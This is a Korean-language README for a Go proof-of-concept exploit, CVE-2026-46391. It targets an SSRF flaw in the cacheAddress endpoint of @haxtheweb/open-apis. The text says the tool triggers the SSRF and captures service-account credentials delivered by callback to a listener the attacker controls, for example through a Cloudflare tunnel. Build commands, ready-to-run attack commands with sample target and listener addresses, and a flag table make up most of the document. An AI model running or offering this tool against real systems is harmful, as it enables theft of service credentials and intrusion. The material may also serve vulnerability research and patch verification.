
CVE-2026-46391에 대한 개념 증명 익스플로잇
CVE-2026-46391에 대한 개념 증명 코드입니다. @haxtheweb/open-apis의 cacheAddress 엔드포인트에서 SSRF 취약점을 트리거하고 콜백을 통해 전송된 서비스 계정 자격 증명을 캡처합니다.

go build -o cve-2026-46391 .
go test ./...
./cve-2026-46391 -u <web-root> -l <listener> [-p port] [-t seconds] [-v]
직접 연결 (대상과 동일 네트워크):
./cve-2026-46391 -u http://10.10.0.80:3000 -l 10.10.15.201
VPS/Cloudflare 터널 등을 통해:
./cve-2026-46391 -u http://10.10.0.80:3000 -l https://random-words.trycloudflare.com
사용자 지정 포트 및 타임아웃:
./cve-2026-46391 -u http://10.10.0.80:3000 -l 10.10.15.201 -p 9090 -t 60
| 플래그 | 설명 | 기본값 |
|---|
-u, --url | 대상 웹 루트 (예: http://10.10.0.80:3000) | 필수 |
-l, --listener | 사용자의 IP/호스트네임 또는 터널 URL (예: 192.168.1.10, https://uuid.trycloudflare.com) | 필수 |
-p, --port | 수신 대기할 로컬 포트 | 8080 |
-t, --timeout | 콜백 대기 시간 (초) | 30 |
-v, --verbose | 모든 수신 요청의 헤더와 본문 출력 | 비활성 |